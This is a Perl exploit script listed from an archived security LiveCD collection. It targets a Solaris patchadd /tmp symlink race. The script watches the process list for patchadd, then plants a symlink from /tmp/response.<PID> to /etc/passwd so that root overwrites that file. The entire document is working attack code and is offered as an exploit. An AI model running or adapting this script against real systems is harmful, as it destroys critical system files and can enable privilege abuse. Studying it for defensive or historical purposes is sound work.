home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / patchadd-ex.pl < prev    next >
Perl Script  |  2005-02-12  |  895b  |  34 lines

  1. #!/usr/local/bin/perl
  2. #Exploit for patchadd Solaris 2.x. Symlink /tmp file creation
  3. #vulnerability
  4. #patchadd creates files in /tmp with mode 644 that can be used to clobber
  5. #system files when executed by root.
  6. #Larry W. Cashdollar
  7. #http://vapid.dhs.org:8080
  8. #See BID http://www.securityfocus.com/bid/2127
  9. #Discovery credit: Jonathan Fortin jfortin@revelex.com
  10. #Tested on SunOS smackdown 5.8 Generic_108528-10 sun4u sparc SUNW,Ultra-5_10
  11.  
  12. use strict;
  13.  
  14. my $NOISY = 1; # Do you want quiet output?
  15. my $clobber = "/etc/passwd";
  16.  
  17. print "Listening for patchadd process...\n" if ($NOISY);
  18.  
  19. while(1) {
  20.   open (ps,"ps -ef | grep -v grep |grep -v PID |");
  21.  
  22.  while(<ps>) {
  23.    my @args = (split " ", $_);
  24.  
  25.      if (/patch/) {
  26.         print "Targeting PID $args[1] and symlinking response.$args[1] to
  27. $clobber\n" if ($NOISY);
  28.         symlink($clobber,"/tmp/response.$args[1]");
  29.         exit(1);
  30.       }
  31.  }
  32.  
  33. }
  34.